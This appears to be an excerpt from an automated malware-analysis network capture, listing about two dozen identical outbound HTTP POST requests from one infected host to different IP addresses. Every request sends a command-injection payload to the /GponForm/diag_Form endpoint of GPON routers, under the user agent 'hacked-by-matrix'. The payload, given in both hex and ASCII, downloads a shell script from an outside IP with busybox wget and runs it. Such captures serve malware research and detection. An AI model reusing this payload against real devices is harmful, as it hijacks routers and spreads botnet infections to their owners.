                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        114192.168.2.1350700118.218.116.1443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434403896 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        115192.168.2.1333908118.171.107.160443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434434891 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        116192.168.2.1349800118.96.95.253443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434470892 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        117192.168.2.135775242.24.183.97443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434501886 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        118192.168.2.1350890118.240.233.70443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434533119 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        119192.168.2.1351620212.76.1.110443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434546947 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        120192.168.2.1340716109.24.23.82443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434577942 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        121192.168.2.1357804109.92.220.213443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434607029 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        122192.168.2.1355284212.206.165.7443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434633017 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        123192.168.2.1333300212.173.182.123443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434645891 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        124192.168.2.1357376109.19.21.193443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434670925 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        125192.168.2.1354580118.207.51.54443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434679031 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        126192.168.2.134831642.145.26.100443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434715986 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        127192.168.2.1351958212.132.194.21443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434739113 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        128192.168.2.1335258212.161.3.120443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434770107 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        129192.168.2.13458685.127.245.195443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434791088 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        130192.168.2.1346374109.89.109.139443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434807062 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        131192.168.2.1356550109.54.80.143443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434820890 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        132192.168.2.13536725.92.102.43443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434853077 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        133192.168.2.1358892212.156.187.30443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434886932 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        134192.168.2.1351696118.214.245.23443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434916019 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        135192.168.2.134986442.245.180.56443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434974909 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        136192.168.2.1344900118.54.13.171443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:21:47.434993982 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
